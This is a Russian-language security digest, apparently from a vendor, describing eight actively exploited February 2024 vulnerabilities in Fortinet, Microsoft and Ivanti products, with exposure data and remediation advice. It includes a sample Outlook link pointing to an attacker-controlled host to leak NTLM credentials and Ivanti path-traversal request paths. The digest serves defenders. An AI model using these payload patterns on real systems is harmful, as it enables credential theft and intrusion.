В февральском дайджесте мы выделили самые опасные уязвимости месяца, которые активно использовались злоумышленниками в атаках или могут быть использованы в ближайшее время. В феврале их было восемь. Актуальными были уязвимости в продуктах Microsoft, которые могут быть проэксплуатированы в фишинговых атаках и нанести вред инфраструктуре компании при открытии письма в Outlook или вредоносного файла. Эти уязвимости требуют особого внимания не только специалистов по ИБ, но и обычных сотрудников любой компании, использующей продукты Microsoft.
Мы обращаем особое внимание на уязвимость в продукте компании Fortinet, которая позволяет выполнять произвольный код и получать доступ к активам сети.
Кроме того, громко прогремели сразу несколько уязвимостей в решениях Ivanti. Продукты этого вендора используются компаниями для предоставления удаленного доступа сотрудникам. Эти уязвимости стали сразу активно эксплуатироваться злоумышленниками. Американское агентство по информационной безопасности (CISA) даже потребовало отключить продукты Ivanti во всех федеральных учреждениях.
Подробнее про все уязвимости, случаи эксплуатации и способы устранения читайте в дайджесте.
Подробнее об этих уязвимостях
Уязвимость в Fortinet FortiOS и FortiProxy
- Уязвимость удаленного выполнения кода в Fortinet FortiOS и FortiProxy (CVE-2024-21762, CVSS — 9,8)
Эксплуатация уязвимости позволяет неаутентифицированному злоумышленнику выполнить произвольный код с помощью специально созданных HTTP-запросов. Уязвимость выполнения произвольного кода в Fortinet FortiOS и FortiProxy (CVE-2024-21762), по данным вендора, используется в хакерских атаках. Ранее Fortinet сообщала о том, что злоумышленники использовали похожую уязвимость FortiOS для развертывания трояна удаленного доступа Coathanger.
В рекомендациях Fortinet не содержится никаких подробностей о том, как используется уязвимость или кто ее обнаружил.
Количество потенциальных жертв: опираясь на данные Shadowserver, количество устройств, у которых присутствует FortiOS SSL VPN, — более 446 000. В России это ПО выявлено на 2664 узлах, также по версии Shadowserver.
Публично доступные эксплойты: нет в открытом доступе.
Способы устранения, компенсирующие меры: для устранения уязвимости требуется обновить ПО, следуя рекомендациям, заданным Fortinet. Если нет возможности немедленно загрузить обновления, для снижения рисков можно временно отключить SSL VPN на устройствах FortiOS.
Уязвимости в продуктах Microsoft
- Уязвимость обхода функции безопасности Windows SmartScreen (CVE-2024-21351, CVSS — 7,6)
В результате эксплуатации этой уязвимости злоумышленник получает возможность обойти проверки Windows Defender SmartScreen. Уязвимость может быть использована для доставки ВПО на систему. Для эксплуатации требуется взаимодействие с пользователем: злоумышленнику необходимо отправить цели специально созданный вредоносный файл и убедить его открыть содержимое, что может быть использовано при фишинге.
- Уязвимость обхода функции безопасности ярлыков веб-страниц (CVE-2024-21412, CVSS — 8,1)
Эта уязвимость позволяет доставить вредоносное ПО на целевую систему.
Для эксплуатации уязвимости злоумышленнику необходимо отправить пользователю ссылку на контролируемый преступником ресурс, на котором размещен специально созданный файл с двойным расширением (*.jpeg.url). Этот файл, в свою очередь, указывает на другой файл ярлыка, содержащий логику для использования ранее исправленной уязвимости обхода SmartScreen в Microsoft Defender (CVE-2023-36025).Сама фишинговая страница представляет из себя тег <a> на HTML-странице злоумышленника с названием картинки (*.jpg). Жертве остается только кликнуть на нее, подтвердить использование проводника и открыть сам файл.
Рис. 1. Фишинговая страница Опасность заключается в том, что Microsoft Defender не предупреждает пользователя о том, что открытие идет с недоверенного ресурса (не отрабатывает функция MoTW). Пользователя также может запутать то, что проводник открывается в папке с названием Downloads («Загрузки»), хотя по факту она лежит на стороннем ресурсе.
- Уязвимость в Microsoft Outlook, приводящая к удаленному выполнению кода (CVE-2024-21413, CVSS — 9,8)
Эксплуатация обходит Protected View в Microsoft Outlook, что позволяет удаленному злоумышленнику добиться открытия жертвой вредоносного документа в режиме редактирования, что может привести к удаленному выполнению кода в системе.
Суть атаки заключается в том, что пользователю в Outlook приходит письмо со ссылкой (тег <a> в HTML), которая с помощью протокола file обходит средства защиты Outlook и позволяет доставить жертве ссылку вида:
<a href="file:///\\X.X.X.X\test\test.rtf!something">где X.X.X.X — адрес, находящийся в локальной сети (принадлежит злоумышленнику).
В этом случае доступ к файлу test.rtf!something будет осуществлен по протоколу SMB, а значит, будет раскрыта NTLM-информация о пользователе. Суффикс !something позволяет избежать предупреждений безопасности от Microsoft Outlook. Информация взята из исследования Check Point Research
- Уязвимость сервера Microsoft Exchange, приводящая к несанкционированному повышению привилегий
(CVE-2024-21410, CVSS — 9,8)
Уязвимость повышения привилегий в Microsoft Exchange Server. Ее эксплуатация позволяет злоумышленнику провести атаку типа NTLM Relay (тип атаки, при котором злоумышленник перехватывает аутентификационные данные, использующие протокол NTLM, и перенаправляет их на другой сервер или сервис с целью получения несанкционированного доступа) и успешно пройти аутентификацию на сервере Exchange.
Случаи эксплуатации всех уязвимостей Microsoft: по данным Microsoft, зафиксированы факты эксплуатации всех уязвимостей. Кроме того, Trend Micro зафиксировала эксплуатацию уязвимости CVE-2024-21412 APT-группировкой Water Hydra. Их фишинговые компании были направлены на трейдеров финансовых рынков.
Количество потенциальных жертв всех уязвимостей Microsoft: нет информации.
Публично доступные эксплойты: есть в открытом доступе для CVE-2024-21413, для остальных уязвимостей Microsoft — нет.
Способы устранения, компенсирующие меры: для устранения уязвимостей требуются обновления безопасности, их можно скачать с официального сайта Microsoft на страницах: CVE-2024-21351, CVE-2024-21412, CVE-2024-21413, CVE-2024-21410.
Уязвимости в продуктах Ivanti
- Уязвимость подделки запроса на стороне сервера в продуктах Ivanti Connect Secure, Ivanti Policy Secure,
Ivanti Neurons for ZTA (CVE-2024-21893, CVSS — 8,2)
Подделка запросов на стороне сервера (SSRF) присутствует в программном обеспечении Ivanti Connect Secure (ICS), в компоненте Security Assertion Markup Language (SAML). Возникает из-за отсутствия аутентификации, использования устаревшей версии XMLTooling, подверженной SSRF, для обработки данных XML на стороне сервера, а также из-за возможности отправлять вредоносные данные XML на конечную точку.
- Уязвимость обхода аутентификации в Ivanti Connect Secure и Policy Secure (CVE-2023-46805, CVSS — 8,2)
Эта уязвимость нулевого дня в программном обеспечении Ivanti Connect Secure (ICS), ранее известном как шлюз Pulse Connect Secure, и Ivanti Policy Secure. Уязвимость присутствует в версиях 9.x и 22.x и возникает из-за того, что сервер не осуществляет полноценную проверку доступа к файлам по одному из путей:
В связи с этим неаутентифицированный злоумышленник может перемещаться по директориям сервера и взаимодействовать с конечными точками на нем, используя для перемещения в родительские директории:/api/v1/totp/user-backup-code//api/v1/totp/user-backup-code/../../«Если CVE-2023-46805 используется совместно с CVE-2024-21887, эксплуатация не требует аутентификации и позволяет злоумышленнику создавать вредоносные запросы и выполнять произвольные команды в системе (Remote Code Execution)», — написали в Ivanti.
- Уязвимость внедрения команд в Ivanti Connect Secure и Ivanti Policy Secure (CVE-2024-21887, CVSS — 9,1)
Это еще одна уязвимость нулевого дня в программном обеспечении Ivanti Connect Secure версий 9.x и 22.x. Она дает возможность злоумышленнику, аутентифицированному в роли администратора, выполнять произвольные команды на устройстве. Смысл эксплуатации заключается в том, что на конечную точку подается вредоносный аргумент, который во время обработки приложением попадает в функцию создания нового процесса или команды (например: popen() в Python). Эта уязвимость может быть проэксплуатирована через интернет.
Используя ее в связке с CVE-2023-46805, можно получить удаленное выполнение кода (Remote Code Execution) на узле, не требующее аутентификации.
Количество потенциальных жертв уязвимостей в продуктах Ivanti: по данным Shadowserver, в сети работает более 19 500 устройств Ivanti Connect Secure.
Публично доступные эксплойты: есть в открытом доступе.
Способы устранения, компенсирующие меры: Ivanti выпустила обновления безопасности и 14 февраля заявила, что устранила эти CVE-2024-21893, CVE-2024-21887 и CVE-2023-46805 уязвимости в Ivanti Connect Secure (версии 9.1R14.5, 9.1R17.3, 9.1R18.4, 22.4R2.3, 22.5R1.2, 22.5R2.3, 9.1R15.3, 9.1R16.3, 22.1R6.1, 22.2R4.1, 22.3R1.1,22.4R1.1 и 22.6R2.2), Ivanti Policy Secure (версии 9.1R17.3, 9.1R18.4 22.5R1.2, 9.1R16.3, 22.4R1.1 и 22.6R1.1) и ZTA-шлюзах (версии 22.5R1.6, 22.6R1.5 и 22.6R1.7). В тех случаях, когда обновления безопасности не установлены, можно использовать XML-файл, который доступен для клиентов Ivanti. Он позволяет смягчить воздействие от возможной эксплуатации.
Агентство CISA выпустило статью с вариантами смягчения и устранения уязвимости.
Как защититься
Использование популярных продуктов, содержащих трендовые уязвимости, может поставить под угрозу любую компанию. Такие уязвимости являются наиболее опасными и требуют немедленного исправления. В систему управления уязвимостями MaxPatrol VM информация о трендовых уязвимостях поступает в течение 12 часов. Это позволяет своевременно принять меры по устранению наиболее опасных из них и защитить инфраструктуру компании.
В дайджесте представлены примеры уязвимостей, которые активно эксплуатируются в последнее время. Информация о них и о публично доступных эксплойтах представлена по состоянию на 29 февраля 2024 года.